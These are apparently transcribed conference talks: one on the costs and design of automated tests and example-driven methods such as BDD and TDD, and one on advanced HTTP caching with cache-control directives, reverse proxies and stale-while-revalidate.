must understand that there are going to be costs to automating our examples. And sometimes those costs are not justifiable. So we need to understand that there are going to be costs to automating our examples. So we need to look at our examples on a, not necessarily on a case by case basis, but we certainly need to think about whether there's enough benefit to carry the burden of writing those examples in the first place, automating them, and then maintaining them. I've got the statement there, remove unnecessary examples. So do we really need an example? How many examples do we need? So Matt likes to think about your set of examples being a tent with lots of guy ropes. So your system is the tent and the guy ropes are the tests or the examples that demonstrate how it works. You don't need to have millions and millions of guy ropes. You need enough guy ropes to make sure the tent doesn't blow away. I was looking at a piece of software where someone was writing a conversion, a conversion code that converted from Roman numerals into decimal. And it looked, it was a kind of odd piece of code in the first place. But it looked like the examples that were driving it were fairly reasonable. And it was in.NET and I was looking at in Visual Studio. And I suddenly realized that it was a templatized test case. And that it only looked reasonable because the region that specified all the template instantiations had been collapsed. When I uncollapsed it, it turned out that there was a test case for every single Roman number between 1 and 3999. Now, at this point, you can ask yourself, is that, that was certainly an exhaustive set of tests, but was it necessary? If you were writing those tests for an enterprise system and you started writing test cases for every length of, every length of user name, customer name for instance, or can I check out every single different item that's in our inventory, you would soon get bogged down. So you need to, you need to obviously use judgment. So when thinking about the cost and benefit of tests, it's helpful, like so many domains, it's helpful to divide it up into a quadrant. So we have benefits or risk going up the y-axis, and we've got the cost of implementing the test along the x-axis. So what I, I would suggest that if it's really expensive to automate these tests and the benefit or the risk that you perceive from this part of the system failing is low, that you're probably not, it's not worth, it's not worth implementing those as automated tests. However, if the cost is low and the risk is high, absolutely a lot of value in having automated examples there. Low cost, low risk, that's your bread and butter, these are your unit tests, your component tests, these are the things that you use to drive out the system. And if you have expensive to maintain and implement examples, but you have high risk of the system failing, this is the area where you need to consider what infrastructure you need to put in place to make it easier to maintain and write those examples. So this is, there's, in a system you often have an external facing UI, you may have an API if you're offering up a service of some sort or a library, and people often think about acceptance tests as invoking the whole of the application, the whole of the system that you're delivering. So you will frequently see tests that start at the UI, go through all the way to the database, and then all the way back up again, and you will check what's going on in the UI to make sure that everything worked. And in the same way that I was talking about workflow tests being useful from time to time, those sort of tests are also useful as system tests. The trouble with this is that they're generally slow, they're costly to set up, and they're often brittle because they're using a lot of the interactions between your system and other systems on the network, other subsystems, they may be using databases, they may be using the file system. The UI as well is a component that tends to change frequently. So this point here is again common across the board. We need to focus on examples that are understandable to our stakeholders, but we need to make sure that when we come to automate those examples, we don't immediately think that we have to test the whole system. So many of these tests, many of these examples can be automated using just slices of the system, a small subset of the components. And related to that, even when you're exercising the UI, it's really valuable to remember that the UI itself is a component. So when you're designing your system, you're implementing it, consider that you want to exercise the UI without creating the whole of the rest of the application. Think about a faked business layer so that you can create those situations that are hard to create if you were using a real business layer such as timeouts, network disruptions, etc. And equally, you can provide data that you have, you can data, faked data, data that fits the behavior that you want to experiment with and describe. So I would say that this is one of the most important things that gets missed so often. We get very top-heavy tests which always go through the UI all the way to the database, and we get no tests of the UI in isolation. Essentially, even on good tests, in good sets of tests, you end up with a lot of component tests, but as soon as people want to write, automate examples that interact with the UI, you then have full system tests. This leads to big, slow and brittle test harnesses. So I feel at this point I should introduce the testing pyramid, which I'm sure many of you have seen. And this emphasizes what I'm talking about. The smaller, the finer the granularity of the test, the smaller the component that we're exercising, the more tests we would expect to see. So at the bottom, this bottom slice would typically be unit tests. We're thinking about the tests that our developers write. In the middle, we may typically be thinking about component tests, interaction tests that developers might write. These may also be automated examples that we develop with our business. Right at the top, we have end-to-end system tests. So this diagram often gets shown with this top part of the diagram being called UI tests. But I think that confuses matters. What we're really talking about is how much of the system are we exercising? How thick is that stack? And end-to-end tests is about as thick as it can get. It's because you're testing the whole of the system. And not to be forgotten is right at the top of this pyramid, there's always a cloud. And we know clouds rain. And you can never get away from the fact that there has to be some manual testing. Exploratory testing isn't part of the rain cloud. It's part of the manual process, but it's entirely essential. So many organizations come to BDD and the other mechanisms from a background of we want to speed up our automated regression testing. And although that is a side effect of automating your examples, it's certainly not the primary goal. And even if you can translate most of your requirements into automatable examples, you'll still need exploratory testing. And it's a great skill that needs to be developed in your testers. And I recommend a book by Elizabeth Hengenson that came out, I think, last year called Explore It. Now, it's all very well-seeing that this is the structure, this is the layout of tests that you should be aspiring to. But most systems make it very, very hard to write your tests, to automate your examples in that way. And the problem is that we haven't architected and designed our systems to be able to swap in and out at layers. We haven't built seams into our systems. So Michael Feathers, who's been working in this area for many years, wrote a book called Working Effectively with Legacy Code. And he talks about refactoring legacy code to provide seams where you can decouple parts of the system from the rest of the system, allowing you to inject fakes or mock objects to allow you to write tests against those subsystems. And at that point, you think to yourself, well, okay, how am I going to go about doing this? Because most of us will be working on legacy systems. So how many of you think that you're working on a legacy system? How many of you have got unit tests that cover your system adequately? Right, okay. So there's a big discrepancy there. And the real challenge that many organizations face is moving from a situation where you have a system that is essentially untestable to a system that is testable. And for any of my advice about writing examples that only excise parts of your system to be applicable, you have to actually start refactoring your system to decouple the major components of it from each other. So that's probably out with the scope of today's session. Obviously, if you haven't read Michael's book, I suggest that you have a look at it. The main takeaway that I'd give on that particular regard is that please don't ask your managers to schedule in six months of refactoring, because that's going to cause everybody pain. No one's going to enjoy it. The way to go about trying to make your system testable is to identify the parts of the system that change the most and work there, introducing seams in a safer way as possible so that when you come to make changes there the next time, you are able to write tests around it. These are, this sort of messy blackboard of interacting in tightly coupled code is a side effect of poor development practices. So we need to upskill so that the new bits of code that we write that maybe sit out to the side of our existing legacy system are at least well factored and that we can drive them from examples, we can test them independently. The legacy part we have to go very softly with and make small modifications, introducing seams and doing very rigorous testing to make sure that we haven't broken something along the way. There are some mechanisms for doing that. So what's the difference between all of these techniques that I was talking about, BDD, ATDD, specification by example and so on. So this is a spot the difference slide. Can you tell the difference between what's on the left and what's on the right? So I don't think there is a difference. So I have Liz in the audience so she can, this was one of her blog posts which is very influential and a very good blog post. And essentially there is no real difference between any of these techniques. They all address the same problem and the problem is getting people to agree what should be done and communicating about it. Now I think there are a few things that are subtly different which come from who is collaborating at working out what those examples are. When we have the developer, the tester, the business owner and other experts sitting around the table using examples to drive out a system, collaborating using the ubiquitous language, we are working on discovering the domain. We are decomposing the problem into sets of examples. We are using the examples to illustrate what the business rules are, to illustrate what our acceptance criteria might be. And I would suggest that in general when developers are practicing TDD, it's not as collaborative as this. Now that's not to say that you can't work collaboratively using JUnit or NUnit. You absolutely can. And referring back to the Goose book at the beginning, if you look at the examples that they write there, you could actually sit down with the business owner with many of those and discuss whether that example was what the business owner was wanting. But in general, we have these two layers. We've got a collaborative layer where we have all of the stakeholders in the development team working together trying to illustrate the system using examples. And then down in the solution domain, we have the technical experts working in a slightly different way to discover the solution design, to try and drive out the actual implementation. So if I was to draw a line, I would say that TDD is typically not as collaborative as the ATDD, BDD, and specification by example practices. In fact, I would say almost always, TDD is done by developers for developers. When we're talking about collaboration, since it's a new book and I think it's an important book that a lot of people working in this space will benefit from reading, I would like to point you to this graphic novel called Commitment by Chris Matts and Olaf Marsen. And this covers a topic called feature injection, which is slightly off to the side of what we're talking about today. But it certainly talks about how the collaboration process should start early on and we should get people talking to each other in a way that drives out our solution. Another thing I think separates some of the techniques, the TDD level techniques from the more collaborative techniques that we've been talking about, is about how essential automation is to making it successful. So when we're just collaborating, when we have our business, our test and our developers collaborating around examples, this is beneficial, hugely beneficial, even if we don't get as far as automating those examples. So a figure that I typically use is you get 70% of the benefit from just sitting around working on those examples together early in the process. You do get benefits from going that extra step and automating your examples. So the living documentation, you get a regression test suite. These are not to be sneezed at. But as I was trying to say earlier, if you come to the example-based development techniques thinking that you're going there because you want to automate testing, you're going to miss out on many, many of the benefits. And so essentially I think that the costs and benefits of automating your examples vary depending on where you are in that test automation pyramid that I was showing you. So if you're low down working on unit tests, automation is essential. One of the main reasons we've got that unit test framework there is so that our developers can refactor quickly and easily. So they get immediate feedback about errors that they may have introduced. As you move up the pyramid, those examples become harder to automate. Their run times increase. And you get to a point where the benefit may... there is a trade-off. So if there was a division here, again I say the division would probably be between the developers on their own working on technical implementations, working on unit test code where automation is essential, and the collaborative techniques where a lot of the benefit is derived from just actually talking to each other. At this point, are there any questions? I didn't think so. So you might have noticed as I went through this talk, I use the word test sometimes, example other times and specification other times. I've actually given a similar talk that Liz was in the audience with before, and she said, never use the word test. Which is not never, okay, but try not to use the word test. And it's incredibly hard because we do often think about things being tests. Dan, who's also in the audience, is he? No. Dan North, who was the developer of JBehave, who coined the term behavior-driven development, started off doing that because he said the word test that people had to put into their tests made them think in the wrong way about what they were writing. It put them in the wrong mindset. And so he developed this tool that allowed you to write the word should, a seemingly innocuous change, one word in the English language, but he said that it had very profound implications. So I wonder if we could, can we settle on a word that isn't test? I think I've demonstrated throughout this talk that I find it very difficult not to move away from the word test. Here are a couple, these are three possibilities that are out there in the public at the moment. Example, it clearly is sitting in there with these example-based techniques. Specification by example has become popular. But recently I came across a slide deck by Elizabeth Hendrickson, where she thinks about testing something as being a combination of checking that it works and exploring that it behaves in the way that you want. And there Elizabeth is using Brian Marrick's testing quadrant to separate between the team-facing activities of unit testing and acceptance testing and the product critiquing activities of checking that things behave in the way that you expect. The exploratory testing doesn't show up any major issues and you get the performance that you require. So this led me thinking that maybe I should add check to the list of possible names. And I wonder if we could start using the word check, maybe that would improve the way we think about things. However, it's far too late for that. We have definitely got to a point now where test specification example are all in the public domain and we're going to have to cope with them. So in a domain where we stress the ubiquitous language, we actually have a bundle of terms that lead us into ambiguity. And I don't think there's anything we can do about it. So at this point, I just want to just skip out a second. Just to describe some of the desirable properties that I think all of our examples should demonstrate. I don't think anyone reading that, these five items would argue that these are not desirable things in an example. We want to be able to understand them, maintain them, we need them to be necessary, we want them to be at the right level of granularity, and we want them to be reliable. But I'm going to take just a couple of minutes to delve into those a little bit deeper so that we actually get a feeling for what that means. So for something to be understandable, it means that someone needs to be able to come to this example and immediately be able to get the benefit of reading that example. And this happens on several different levels. So there's the level of documentation that I talked about earlier, but equally, when that example fails, when your system no longer behaves in the way that you expect, or when someone has introduced a regression, that example should communicate that problem, should communicate that error in an immediately understandable way. So, understandability isn't just about being able to read the example, it's about when you automate it, the failing of that automated example immediately communicates to the person reading that failure report what went wrong. We're looking for our examples to be the single source of truth within the system of the requirements and the implementation. We need to make sure that our suites of examples of automated examples of automated tests are maintainable. A huge problem that I see from time and time again is people start off developing these suites of automated examples and they have a really great time doing it. And then something changes, a requirement changes, and they then find that these examples are a huge drag. They find it difficult to refactor them. They find it difficult to go and change them all. So I was working on a system where we had a wonderful suite of automated, these were tests rather than examples, and there was a breaking change made when we went from one version to the next version. But we needed to get it out for a particular ship date, and so all of those automated tests broke and they were never fixed. I went back to that client, 12 years later, those tests still had never been run again. So you get a really big drag from a set of examples that are not maintainable. It's not huge rocket science keeping your examples maintainable. It's the same sort of techniques that developers use every day, the pragmatic ideas such as do not repeat yourself. Trying to make sure that you don't have duplication, you don't keep doing things in different ways, you extract things out into abstractions, keeping your classes and your concepts independent. So this is a slide that speaks to my experience with the Roman numeral testing. How exhaustive do we need to be? Jerry Weinberg recently wrote a book called Perfect Software, and he's very big on the fact that actually there's no such thing as perfect software. What we have to do is understand the risk that we're prepared to take and do as much as we can to bring it within our own appetite for risk and the business risk. Granularity is possibly of all five properties. Granularity is the hardest one to communicate, the hardest one to talk about. We like being efficient, so I've just talked about not repeating ourselves. But when it comes to granularity, I'm also trying to say that each example, each test should only exercise a single behavior. So the sort of style of workflow or imperative test that does a bundle of things and then makes an assertion, then does a bundle of other things and makes another assertion, is a bad level of granularity in general. So that's a strong statement. The reason I don't like it is because what you're doing is you're making the subsequent assertions dependent on the earlier assertions. So that means that if you introduce a problem and it fails on an early assertion, well then you may fix that problem and discover there are other problems that will be uncovered by assertions that come later in the example. So wherever possible, I like to have a single behavior per example. And I guess finally, reliability, it's just so key to all of the practices of doing automation that I think we need to dwell upon it. Because again, many clients that I go to, you look at their continuous integration server and you'll see a failed build. And I ask, so what's wrong with this build? And they'll go, no, there's nothing wrong with it. It's just there's one test in there that fails every Thursday. Or, no, that test, when I run it on the desktop, it's fine. So we just ignore it. These are bad things. What we want is we want our continuous integration server to give us an immediate signal that something's wrong. If we get a failure, it means that something's gone bad and we need to fix it. If we get into the way of thinking that, oh, we can ignore this failure, then we aren't doing continuous integration. And we don't get the benefit from keeping our code clean and knowing that we can release at any time. So take a ways that I'd like to leave you with from this session are that all of these methods, all of these mechanisms are very similar. In fact, they're identical, apart from the fact that specifically technical ones are focused on driving out a solution and don't have the collaboration of your business stakeholders as well. And so at that point, there are some practices that become less valuable. Or, in fact, and there are other practices that become more valuable. So the automation is hugely essential when you're working at the technical level. As if there was one message to take away for your next set of automated examples, it's try and avoid testing through the UI. If you end up with too many UI tests, your test run will take forever, it will be brittle, and you will find that you shy away from adding new tests. You will take a risk-based approach to which of those examples you execute on a daily basis. And finally, the naming genie is out of the bottle. We're not going to get away from the fact that we call them examples, we call them tests, we call them specifications. They're all there, they're all out there in the public domain, and there's nothing we can do about it. So thank you very much for coming along. If there's any questions, I'd be happy to take them. Please remember to put a coloured card in the box as you go out.
|
There are a wealth of methods that use specifications, examples and tests to drive out the design and implementation of software systems: TDD, ATDD, BDD, SbE and more. Beyond a common feeling that the use of the T-word (test) is unfortunate (because it serves to distort the intent and distract the focus of the practitioner) there is little agreement. A further impediment, from a development perspective, has been the partitioning of the techniques into business-facing (ATDD, BDD, SbE) and technical (TDD). All methods that make use of executable examples require the participation of developers and share a common subset of pitfalls and gotchas. This session will demonstrate the commonalities between the methods and show how they can work together productively to grow software. We will examine effective techniques that should be used irrespective of the layer at which you are working, while highlighting concerns that are specific to the business and technical layers. Tooling will only be discussed to the extent that it empowers a particular technique.In conclusion, we will make a case for a more inclusive nomenclature that emphasises the shared underpinnings of all example-based techniques.
|
10.5446/51512 (DOI)
|
Hello everyone, thanks for coming. There's quite a few of you. Just in case you made a mistake, I am not John Skeets, that's in another room. So if you were wanting to see that, go now, it should be a good show. We're going to talk about advanced HTTP caching. There's not very much of this that is advanced beyond the fact that no one uses any of the stuff I show you. When I say no one, it's my presenter, no one, which means nearly no one uses those features of HTTP. So we're going to go through a few of the things that you can do when you use HTTP caching properly, which helps scale things and use cool technology and reduce the load on your servers and plenty of other good things. So before we start, because this is an advanced talk, have any of you come to my introduction to HTTP caching? No. Okay. So I hope, I fully hope that most of you understand already how to make a resource or a document on the web server cached. But just in case I'm going to repeat some fundamentals that you can see on the screen, it's called the freshness model. And it's something that is confusing for most developers, including web developers. So I want to make sure everybody understands it very well. You can see a lovely unicorn, which we can differentiate from a pony because it has a horn at the top. And at the top is our first request, the first time your browser or your user agent or your service or your JavaScript code tries and gets this rainbow dash unicorn. It is fresh as a baby. Hence the picture. We call that an up to date resource. It is fresh. It's new. It's not been cached by anyone just yet. No one has seen it yet. Everybody goes, oh, let's see it. Everybody goes. Good. Very good. Very good. So the first time we get that request, of course, we've got a bunch of cash and proxies and browser caches that may see our lovely picture. Hello, Ian. How are you? And they may decide to cache this information for later usage. How long can they cache them for however long we provide from the server for the resource to be valid? In this example, on our first request, you can see the cache instruction. Any of you haven't seen an HTTP request on the wire before? You can raise your hand. It is fine. So the gets means that I want to retrieve the resource. Unicorns slash rainbow dash is the URI. It is the name of that resource, the address where you can find it, probably. And the response is a 200, which means everything went fine. Here's a lovely picture of a baby unicorn on which you should go. Was lunch good? Are you feeling it a bit? Okay. We can get more energy in there. I've been sick for the last two days and I'm full of energy. I'm going to try and give you as much as I can. And the cache control header, this is what you see under the 200, is giving you an instruction of maximum age. The maximum age is in seconds, 3,600 seconds or equal to. Don't get your calculators out. It's an hour. No. I see some shocked views in the room. Too difficult a question. Okay. Let's get it down. So that means that any cache that sees that lovely picture of a baby unicorn that should go and make us go better can be cached for an hour. We can serve it for an hour. And for an hour, we're going to consider that this cache on the tree is called fresh. It is fresh. It can continue being served by the cache. So any further request, that's the one you will see in the lower left corner of this slide. Gosh, I had a little laser pointer, but I don't. I'm sure you can do it with PowerPoint, but I've not used that for two years, so I don't remember. Because I switched to Mac. You have one? I love you. That's brilliant. Fantastic. So this request there. That's the second request. A cache somewhere is now able to return a cached entry. Why? Because the picture is still fresh. It is still allowed to be returned. After those 3,600 seconds, and you'll see there's a mistake there. That should say an hour. The entry is considered stale. At that point, if I serve a stale resource from a proxy for whatever reason, I'm going to say that the entry is very old. My baby is not a baby anymore. As such, I do not go... I'm ready. I have to find something else. And I put a little warning here, saying that it's stale. Okay. That's the freshness module. That's how it works with HTTP for all your requests. So when you specify your request must have a must revalidate. That means the server will try and update the resource when it's at that point. Everybody's clear with that? Any questions at this stage? If you're lost on this bit, we're going to have trouble with the rest. No questions? Okay. So we serve stuff from the cache here. And that's good. But sometimes we want to have more control from the client. Did you know that you could control the cache? And the cache freshness from your client, from your JavaScript code, maybe, from your browser, or from your.NET application for.NET developers. How many of you are.NET developers here? Wonderful. How many of you are using the new HTTP client APIs, et cetera? Okay. So it's still the awesome APIs for caching. So you're still a bit stuck with not a very nice API. But you can do all this stuff. You can do all this stuff. And we're going to try and start looking at, oh, did I not put a timer? Normally I put a timer to make sure I don't overrun. By too much. Otherwise, some people start screaming at me and running after me with baseball bats. And it's not very pretty. Not doing that joke again. Standing in the way of control. The control that the client has is completely under control. No one uses it. And it's a shame because we can do a couple of things. So the first thing is to specify in our cache control header, you saw it as a response header earlier. It can be used as a request header. So it can be a header that you add in your code before you go to the server. The first one is max age, the maximum age that the resource has. If I go back to my original freshness, you will see this age header. Any cache that provides you a cache to entry. And that includes, by the way, the local cache on Internet Explorer. If you've got an Internet Explorer version that understands HTTP caching well. So 10. And that's it. More or less. You can see the age here. It's in seconds as well. That means the age of the cache copy is 30 seconds. So we can provide a maximum age. Because the question is how old is too old for our resource? And sometimes too old is too old. If anyone does not recognize the Harry Potter, and that's a play called a cruise. Anyway, I found a picture. I wanted to put it somewhere because I thought it was cute. And we can see it's a unicorn because again, there's a horn there. At least one. So thank you. Thank you. So we can control the maximum age. Why would you want to do that? Well, because sometimes you want to retrieve data and you want to make sure that, well, on average, you may be happy to get the list of latest blog comments of the last minute because you just arrived on a blog entry. Sometimes you really, really want the latest copy because, for example, you just clicked on post for your latest entry. So you want to actually just give me something that is fresh. Max age equals zero. Do not give me a cached copy. So that's one we can use. Another one we can use is Max stale. Now, in our fresh wave, in our freshness model that we saw earlier, we have fresh resources and we have stale resources. By default, the client should not get stale resources. If you say something is valid for 60 seconds, it's going to be served for 60 seconds and after that, it shouldn't be served anymore. But you can say, actually, you know what, I understand that crap happens and I'm okay with having a bit of an older version. So give me as fresh as you can. But if it's stale by 60 seconds, that's okay. I can deal with it. Above 60 seconds, you really need to go and get me a new copy. So we can define how stale we want our content, which that American private joke is not going to be funny for everyone. But again, I found a picture. I thought it was cool. And finally, we have another instruction that we can use on our client. It's a minimum freshness. I want a copy that will still be valid in 60 seconds. See the mind bending there. I want to make sure that the data I retrieve from the cache will still be valid in 60 seconds when I get it. Why would you want to do that? For example, if you have a processing that takes on average 60 seconds behind the scenes and you want to make sure that you really get something that will be valid for 60 seconds. If the age is an hour and the time to leave is an hour and 10 seconds and you provide the minimum freshness with 10 seconds, for the first hour you will get that copy. For the last 10 seconds, it will force a refresh. So this is not letting you control how long the data is going to be valid for when you request it and force any proxy, any cache to go and revalidate the data and get a fresher copy if you request it. This is supported by plenty of cache. And that lets us control the data we retrieve on the client. So if you're not using caching on the client, start using it now. It's cool. And that picture is really just because I thought it was funny. I mean, it's difficult. With cats, you have a lot of possibilities. The unit calls not as many. So, you know, it's a struggle. It's a struggle. So of course we have different levels of caches. I just want to go back a little bit on the kind of caches we have. Just as a re-intro for those of you that have not attended my first talk of not looked it online. The first kind of cache we can do, which is the cache instruction you get there when someone returns you a response, is a private cache. What does a private cache mean? Well, just like a private life is the stuff that you have just for yourself and you don't share with everyone else. So a private cache will be a cache that only caches things for me. Any suggestion at which cache that may be? Anyone? No? Okay. The browser is a private cache. Your Facebook messages are not stored in the same cache as your coworker next to you, which solves a lot of problems in terms of privacy and other things like cats. I'm really falling flat on that one, aren't I? Well, you know, I'll keep on trying. So the browser can cache. If you tell the system cache control private, you're telling it, you're allowed to cache if the cache is not shared by other people. If the data is not going to be returned by two other people. So anything that is personal to you usually gets private cache. And then we'll get the public cache. Public cache means that shared caches can also cache the data. We've got a couple of shared caches that exist. I'll go through them in a minute. One thing I want to bring your attention to, especially if you're a framework developer or if you are working with your own caching solution. By definition, public includes private. It sounds very simple, but it's something that needs a little bit of a mind shift. If I can allow a shared cache to cache my data, there is no reason why I should not allow a private cache to cache it. Because after all, if a big cache can get it, the small cache that caches less things is included in this. What this also means is that in HTTP there is, I was going to say there is no way. There is nearly no way to tell the system you're allowed to cache it on the proxy but not on the client. There is not a separate caching instruction. And that's because if you cache in public, then you can cache in private as well. One includes the other. And that's great for proxies. But think about something like ASP.net caching. Is ASP.net caching any different from a shared proxy or from your business proxy? It sees a request coming in. It reads the content. It stores it somewhere. The next time you go to get the request, it's going to serve it from memory from where it found it. I'm hinting here that if you are using ASP.net caching instead of a reverse proxy, which you're designing an API that does caching that doesn't behave as a proxy, then you may be understanding HTTP caching a bit wrong. Just a suggestion I have there. So what kind of shared caches do we have? Yeah. We've got a lovely graph. So this is my friend Ralph when he goes to work in the morning. I have a lot of unicorn friends. So I am not unicorn phobic. Really falling flat today. So I have a browser. The browser has a cache. We already know about that. The browser usually talks to your proxy. How many of you work in businesses that have some sort of proxy installed? Okay. How many of you have seen web sense errors before? Well, the content to this website is blocked. One at work. Raising of more hands? Okay. So you have the distributed cache already in your company. This is the most underused piece of infrastructure that we have in IT because it's not as cool as saying that you have a distributed hash table cache or velocity cache. But it is exactly the same principle. It's a big set of servers that see stuff arrive in, cache it for you, then give it back from their cache based on the instructions you provided in your response. How many of you have your own custom caching infrastructure in your company, in your software? Your own cache of any type? How many of you are using the proxies in your company to cache stuff on your HTTP interface inside the firewall? All right. So your company is paying twice for a distributed cache technology. One for the one you custom built for your solution and one at the HTTP level with a proxy. Which one do you think is costing the most? These babies cost a huge amount of money, lots of money because they are already serving thousands and thousands of customers. How many of you have a custom distributed cache system that serves thousands and thousands of concurrent connections? One. All right. That's less than the numbers having their own cache technology, right? But we won't talk about that today very much. But use it. It's cool. Okay. It's badly configured in 90% of the time. You have no idea who manages those servers. There are massive amount of rules that follow all the merges that your big company has that basically puts every single website in an exclusion list, which means that it doesn't actually cache anything most of the time. But if you configure it properly, it's a very powerful way of distributing load in your company. So think about that. The second kind of cache is there, the reverse proxy. So this is a trajectory of your default connection. We have a request for a picture of a cat. Although I suspect that Unicorps may be looking at a picture of dogs instead. It goes through the proxy. The proxy goes to the internet. And the end points, Microsoft people like this word, the end point is your reverse proxy. This is the URL that you're going to get to when you type in your browser. And then this is going to forward the request over to your actual server. This is a squid. For those of you that are not very up to date on goodbye, on what is it, seafood. And the reason it's there is because one of the most well-known reverse proxies is called squid. Not just because I like the picture for once. So squid is a very well-known reverse proxy that supports all the features I'm going to show you afterwards. And then finally we get to our server here when the data is not, when the data is not still. So why do we have reverse proxies? Why would we use reverse proxies? What's the point of having a reverse proxy that's squid in your system? Well, there's quite a few points really. First, these babies tend to change a lot. How many of you use systems like Cisco load balancing to dynamically balance between systems and the network level? How is it to configure? Do you have a form to fill in every time there's a change? No. You're lucky. You're very lucky. Anyone works in a bank? Okay. So you would have that. You may have a couple of forms to fill in. No. No. You got a good bank as well. All right. So it's just in London that they're all crazy. That's possible. So normally to be able to change that, you need to find the guys that are managing the Cisco router. They're usually the same guys that are managing the proxies. They're usually in another building, although I suspect it's usually a bunker because I always have a lot of trouble finding them to talk to them. And then you need to fill in the new server that you added and the conditions under which the load is going to be distributed. And all of this is done at the network level. It's not done at the HTTP level. First advantage we have on reverse proxies is that we can dispatch to various servers without anyone noticing. So it lets you change your internal systems much more easily. And another one, of course, is that we don't go back to the server all the time. If your application takes 400 milliseconds to generate the latest entry of blog post, why go there all the time on that full server to get it when you can have a cache here that will happily cache the data and just serve the latest that was still valid four seconds ago. So this lets you scale easily. And the other advantage, of course, is cost. These babies tend to cost money. Those ones usually cost nothing because they don't really need to be very good. So they let you scale on the load much more easily and directly. When we start using, actually, that slide is in the wrong place. Okay, that doesn't matter. When we have shared proxies, as I said before, we may, yes, sorry, that slide was a little bit before. It just got moved by accident. So I'll just cover it anyway. In your head, just imagine we were two slides before. The S Max age is for the shared proxies. So we can define that the resource is going to be valid for 10 seconds on your big proxies and shared proxies and an hour on the local computer. That means Internet Explorer can cache for an hour and ISA server web sense can cache for 10 seconds. That came at the discussion where I was telling you that you couldn't tell the browser to cache differently from the shared caches. So we'll ignore that this is there. And this is apparently plenty of unicorns. But you will have to have a zoom on that. So reverse proxies, yes, they're good, really good. You should use them. We're going back to the reverse proxy. Apologies for that. One other thing as well that we use reverse proxies for is to put at the boundary in your DMZ. Stuff that takes a lot of processing time. Things like SSL or TLS. Because those babies, if you want to scale, have special hardware that help, for example, with TLS encryption. All active network cards, things that you don't necessarily have in your app servers. And the world is moving more and more towards TLS. And as you know, if you're using HTTPS, you don't cache anything in your proxies. Your proxies don't see anything. They just tunnel the requests. They can't share anything because the encryption is point to point. So when we use a reverse proxy in an SSL environment, we keep the security going from the client all the way to the reverse proxy. That's on our DMZ. And the reverse proxy is then chatting on unencrypted channels with our servers. But at that point, we should be inside our network. So there should be no problem with that. So we can remove a lot of the configuration problems, for example, in our applications, getting SSL certificates sorted, getting good scalability encryption mechanisms on the right level by pushing everything on the reverse proxies and letting your app server deal only with building apps. Which is also great if you don't want to go and reconfigure those boxes every time you add or remove one. Any questions so far on the encryption at the boundary? Okay. So once we have in place systems like that, the question becomes at which point of scalability do you start hitting issues? As I said, reverse proxy is going to serve the data as long as it's fresh. What happens when the data is not fresh anymore? Typically, a reverse proxy is going to try and revalidate the data. When I say revalidate, I'm going to take my client, I'm going to say, hey, give me the list of all the latest unicorns. And this one is going to realize, damn, damn, I don't have a fresh version. What do I do? At that point, it is going to re-query your very slow app server to get the latest version. Now, that sounds simple enough in practice. It works. What do you do? There's 10,000 people requesting that list while it revalidates. What do you do? You just wait for 10,000 connections until you get the new version, which is causing a few issues in terms of scalability because data that was on your front page and showed up in 20 milliseconds now take a lot, lot, longer. And people will notice that. That's what we have here. In the first request, we pull the data, it goes into the cache, we return it to the client. The first request is slow. Stuff happens, yes. But that's your hydration of your service, the first time that the data fills the cache. Second time, as long as the data is fresh, we go to the reverse proxy, we get the data there, we return it immediately. That should be damn fast. That's wrong, actually. It is wrong. That's better. Okay. That should be very fast. Your reverse proxies are just serving some bytes from the drive, so it should be really, really quick if it's properly configured. When the data becomes stale, when we've reached the max age, we go to the reverse proxy and then someone else goes to the reverse proxy and everybody waits in a queue until we can revalidate. We go back to the server, say, hey, do you have anything new for me or can I still use my cache entry? We'll get the data back and then everybody gets the response at the end. We just end up with a massive amount of waiting time there. Now, how do we solve that problem? I hear you ask fervently. So there's two ways to solve it. I'm trying to stay on the HTTP side of things on this talk. Know that if you use any kind of advanced reverse proxy, you will have mechanisms that automatically refresh the data for you as the data starts approaching staleness. So 60 seconds before it gets out of date, you can configure your system to go and pull the data again to make sure it's up to date. You can do that, but you need to do it manually. It's boring. It requires network admin intervention and maybe live access systems which you may not have access to if you are in a regulated environment. So instead, we have a new extension of HTTP caching that is being proposed by a guy called Mark Nottingham, which is one of the guys who's both helping writing the HTTP specification. So he knows a thing or two about that. And he also helped write SOAP, but we won't talk about that. He apologized for SOAP, so it's fine. He did the talk. He's on live. I'm not joking. We have a new instruction called stale while we validate. I told you before, by default, a client can say, I want the data fresh, and I want it fresh now. Do not give me stale stuff. All the clients can say, well, give me stale for a while. But the server can tell the reverse proxy or any proxy in the middle in the case where things go stale, you need to go and get a new version for, you know, two, three seconds, continue serving the old version instead of just blocking everyone. That increases scalability quite a bit, because as you can see, the data is already stale. We're going to get a stale version for a little while. As synchronously, the reverse proxy is going to go and get a new version without blocking anyone. So a request coming in still have the data. No one gets blocked. You don't end up with a massive queue and your server doesn't get overloaded. Yay. Next request that comes in after the refresh will get the latest copy. Another extension, of course, is when errors happen. How often do you get exceptions on your web front end? ASP.NET. Who sees exceptions on their live ASP.NET sites? Raise your hands. All right. Crap happens. 99% of errors are transitional in nature. Just at the point you requested it, we had a little bit of a problem with someone stumbling upon a network cable. That lasted for one second until you re-plugged it in. You go one second later. The same request, same functionality you're trying to execute functions properly. So what do we do usually? We retry a couple of times to make sure that any error that is only temporary gets ignored. Now, in the case of a reverse proxy that's validating, that doesn't work. We try and go and re-validate and we end up with a big error. Now, if you are the homepage of Yahoo or Microsoft, what is better? To show the error to the user or to show the latest news but 10 seconds late. In general, we tend not to show errors to users because they kind of don't look very good. Old content is better than bad content. So the stale if error is exactly the same mechanism as we had with the stale while re-validates, it lets you specify that for a bunch of seconds after an error, say five seconds here, if there's an error with the original server, we'll just serve the stale copy. We won't serve stale under any other condition but if the app server crashes for whatever reason, for five seconds, keep on serving the old one. Then hopefully in the five seconds, someone will have reconnected the plug or the guy will stop rolling with his chair on top of the network cable or whatever it is. Some data centers are more lax than others. You never know. So those are two extensions to HTTP caching that are currently being standardized. They're new but they're already implemented in squid. So you can go and have fun with that if you have high traffic websites. Now, of course, we now have cache entries and we know that when they get stale, something is going to go back to our server and gets the latest version. But sometimes we really want to be able to tell the cache to invalidate stuff. Just to tell you by the way, that resource, please just flush the entry you have for it because I'm modifying it. So of course, as the saying goes, there's two difficult problems in computing. There's naming things. There's cache invalidation and off by one error. So that jokes usually gets more laughs than that. Just count. I know you were not very good with counting earlier. But that one is too three. So we can do cache invalidation with HTTP today. So people that tell you there's no cache invalidation in HTTP, it sucks user in such product name here. Oh, wrong. They're wrong. They're absolutely wrong. We can invalidate things. We can invalidate things using HTTP methods. So for those of you that haven't seen HTTP requests before, I showed you a couple of HTTP requests. They all started with get. 